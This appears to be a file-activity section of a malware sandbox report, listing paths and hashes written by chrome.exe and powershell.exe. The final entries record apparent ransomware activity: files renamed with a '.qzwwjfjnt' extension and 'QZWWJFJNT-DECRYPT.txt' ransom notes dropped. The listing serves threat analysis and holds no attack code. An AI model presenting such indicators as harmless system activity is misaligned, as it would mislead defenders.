chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\LOG
text
MD5: 05f224ee2a9950d8b491322f57b31dd2
SHA256: 90d8308c861b4efaa7148683d91cf9c87b1c625e9bfbc936b628cb7fe5732d37
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\000003.log
binary
MD5: 991641dbcc63a7eacba784846f16492f
SHA256: d402a1e89776f26565012ebd063638b57e09e58efc77105415906eebafc0fdd0
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\0ea131f43745e7e8_1
binary
MD5: 80c3acbbfceb5e5973ccd360210414b8
SHA256: e9bad3737e1f66d4703bca09045723ceb1091a9c0934e75aab73a6f3795e6d6a
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt
binary
MD5: 39e27b40fe3f4db34ab2d2f1cf07953f
SHA256: 197e8b3a0147e6580fa2bb76ef024aa5da8a0e1c73806e7aecccc430bdd36178
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\0ea131f43745e7e8_0
binary
MD5: 68861ac0d4f1e867299beef0105209ee
SHA256: bbcc4b65aae0a5d0db0505512091f38b3059e19e11f74607f989e1cd85f38220
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF5fb41f.TMP
binary
MD5: 39e27b40fe3f4db34ab2d2f1cf07953f
SHA256: 197e8b3a0147e6580fa2bb76ef024aa5da8a0e1c73806e7aecccc430bdd36178
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\fdf2cfeb8ad0eeac_0
binary
MD5: eb21774f55f00b6bcd339284602c5499
SHA256: cacd7386feecabb960cd6b2a71a60dc180ed0a5d8575577495dc656bf726f5ba
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\the-real-index
binary
MD5: f2d060d1cafa93d32853e345ea6016f7
SHA256: 25cf24408df0a98a6792951384127b8a0004b8c4431ed5f5c7310ad08da2e73d
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt
binary
MD5: d133e0bb106d6e85f4f95e80fd55011b
SHA256: d890ea88a5b14b371c609f3c804fc46c05c6ad1f586e4db58007a78783be22ca
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF5fb306.TMP
binary
MD5: d133e0bb106d6e85f4f95e80fd55011b
SHA256: d890ea88a5b14b371c609f3c804fc46c05c6ad1f586e4db58007a78783be22ca
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index
text
MD5: 4f67aba5cb5b04976834ad6da18d2017
SHA256: 4476d281b3d119577eb8f19fd90e042e5a456cba30d0bb16d05654acc91aec5b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_1
binary
MD5: a504c5f1bf56897a0e970a63c6b717a1
SHA256: 0f9015ffa192ee707c34a090243c589b89353b60184d9a966b3a258367983547
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_0
binary
MD5: f9a46b9c7fef80d7715ea8cb5af5b8fa
SHA256: c9115ee43e2a1ca13dd017dd4fbc6f094bec13ce7a3b0fa8225f91086319ff38
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010
compressed
MD5: 53eea982d7ad1ad35b35fc3edd48e8a7
SHA256: 949ad5b24488206810f318d1a973ef081b6296b8ec0b89e86102dd18b9b7f092
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f
compressed
MD5: 4ecb446ff8a21ef6d3289e73974117f6
SHA256: 36b6de616ac491341256588a706bd77ffeda7240b9cca5d393b040520c4a5f55
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e
image
MD5: 00f2d72689fb026932085025369d0349
SHA256: 9b788d7954eb7e2da54de87ba6ea05ecdb87bf11d422d2b2051564d0173f7385
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Last Session
binary
MD5: 02536c23edc1e418a6fea313d20b2a39
SHA256: 8e8de8689482b477d0beebe0a4ac24b9cabcbfa84848f66b4c0f55cd96dc0fe9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d
binary
MD5: c78d563770cbb657434d4c7842941dd4
SHA256: 995925c898a83f07520a362cc973eeef63fbe3ad78949398a0606701932c04ea
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old~RF5faae7.TMP
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\50521ac2a7de6658_0
binary
MD5: a6dc24d1c300f3d6f265bff1a584711d
SHA256: 807e8928688d338dd04f6d534cb702578b4b112bb08e051234dc0a172f6b3452
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\40bba07c05914591_0
binary
MD5: 6a1bd69a374184a71c0d5f3aad192ea3
SHA256: dd9d226c253720cab761849be68b776e9819a118b84392ce2dacd18b4ce002f9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\LOG.old
text
MD5: 65e3a899ee20811d157b572ffa34a607
SHA256: fdbc070214092df54b10dc06b2a40f0cc30ad00d410ba67de9f98a3d53f08a75
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old
text
MD5: 7282c871a31b4aae7e61cdbb39a13331
SHA256: af615c556e2a22e87135a967c01e869216f65268a88bd218fd6ab70467bdf733
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old~RF5fa9af.TMP
text
MD5: 7282c871a31b4aae7e61cdbb39a13331
SHA256: af615c556e2a22e87135a967c01e869216f65268a88bd218fd6ab70467bdf733
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\0ea131f43745e7e8_0
binary
MD5: 8eb321616bf1b12c175d54f703f49cb9
SHA256: 4729f8172895019445e58b9b87ce33dff33833f958e08907ed0a5d377150c02f
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c
compressed
MD5: 050c5009c7b47926ed108d655f11fefd
SHA256: 5d5fbdebd5905e344a185085fa89be0c08778eaa5d1f2c1d1475c0a08f6b9fd7
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\1157fee2e2dc1968_0
binary
MD5: a7718eb33187093504bfbb792b8979bc
SHA256: ca4d42f87d4710590f66f07c7926e86230b52bc9b86b4d8db43ee7166e62e19d
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\50da1ec5d44a313d_0
binary
MD5: e90d3af9f1bd9564045c75d1af06b2cf
SHA256: 74f422511b067f9a54d5d135373114e0498bcfb78bd6dd35b18d36cfc819c018
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\27234a8c67dc4f16_0
binary
MD5: dbeac838b15a68392f3b84620893500c
SHA256: 07bc98f7a8da1e25dc6cca59b7f191c17c5e2fc2bb7e99bb5a83ce888c923fc5
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old~RF5fa74e.TMP
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF5fa6d1.TMP
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF5fa682.TMP
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
binary
MD5: 398515593e84cf47a712eadd09e9f44b
SHA256: d5b3486a89f34a0b0ffbeacd074423da9db1dec574638b2901b2519102b4b1b9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model
binary
MD5: 26637c4ed571bd23a2d91ee072350450
SHA256: a029fb110131da9d994d7fac081d82cfe7a9874c92a8c2a2f336ada18b809077
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model~RF5fa634.TMP
binary
MD5: 26637c4ed571bd23a2d91ee072350450
SHA256: a029fb110131da9d994d7fac081d82cfe7a9874c92a8c2a2f336ada18b809077
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\901bd201-968c-4408-99fb-cec0e618ac01.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF5fa2d9.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT~RF5fa2d9.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old~RF5fa2d9.TMP
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF5fa2aa.TMP
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF5fa2aa.TMP
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\0bda02e5-38b2-4599-861c-6f802d892780.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old~RF5fa27b.TMP
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF5fa28b.TMP
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Version
text
MD5: c10ebd4db49249efc8d112b2920d5f73
SHA256: 90a1b994cafe902f22a88a22c0b6cc9cb5b974bf20f8964406dd7d6c9b8867d1
1864
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
binary
MD5: b59113c2dcd2d346f31a64f231162ada
SHA256: 1d97c69aea85d3b06787458ea47576b192ce5c5db9940e5eaa514ff977ce2dc2
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
binary
MD5: 9c016064a1f864c8140915d77cf3389a
SHA256: 0e7265d4a8c16223538edd8cd620b8820611c74538e420a88e333be7f62ac787
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 747195314e5da00a51494ab68ee3c761
SHA256: 5c7cff99c145c5162abe5017064a881912e88c8a77b230ae0332b9e308689cc1
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 4fd37fc3048593304bd2df7af0498101
SHA256: 81a153056d17d93989a43a0c34332370e132b771636c0ad9fcd352fa958066cc
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: aee8e730b362ee5d1937a4695c072792
SHA256: 413a81095073b9b5b0ada9afef876449fdfd71f45b2d20bc9595b1723fcd3e77
256
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.qzwwjfjnt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Videos\Sample Videos\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.qzwwjfjnt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Recorded TV\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.qzwwjfjnt
binary
MD5: c2e21b3080338743c0e8c96565d4f1c0
SHA256: 6fd145894c2873f741043152ad541ab3a0042204d1d434cefa364d5496485234
256
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.qzwwjfjnt
binary
MD5: 60ab83464e22e9cbc76f1aefc7ebb8e1
SHA256: 5a8d405b6618036e114d9c9ecc3603f01b050ee9371faafbf162c4fcf8a1ff7d
256
powershell.exe